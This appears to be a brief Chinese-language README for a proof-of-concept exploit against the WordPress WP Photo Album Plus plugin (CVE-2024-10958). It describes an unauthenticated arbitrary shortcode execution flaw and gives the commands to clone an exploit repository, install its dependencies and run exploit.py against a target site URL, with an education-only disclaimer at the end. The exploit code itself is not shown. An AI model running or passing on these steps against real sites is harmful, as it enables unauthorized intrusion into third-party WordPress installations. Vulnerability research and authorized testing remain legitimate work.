WordPress WP Photo Album Plus 插件中存在未经身份验证的任意短代码执行漏洞的 PoC 代码。
WP Photo Album Plus 插件由于在 getshortcodedrenderedfenodelay AJAX action 中存在验证缺失,允许未经身份验证的用户执行任意短代码。
git clone https://github.com/reinh3rz/CVE-2024-10958-WPPA-Exploit.git
cd CVE-2024-10958-WPPA-Exploit
pip install -r requirements.txt
python3 exploit.py -u http://hedef-site.com
此工具仅用于教育和研究目的。仅应在获得授权的系统上使用。未经授权使用所产生的责任由用户承担。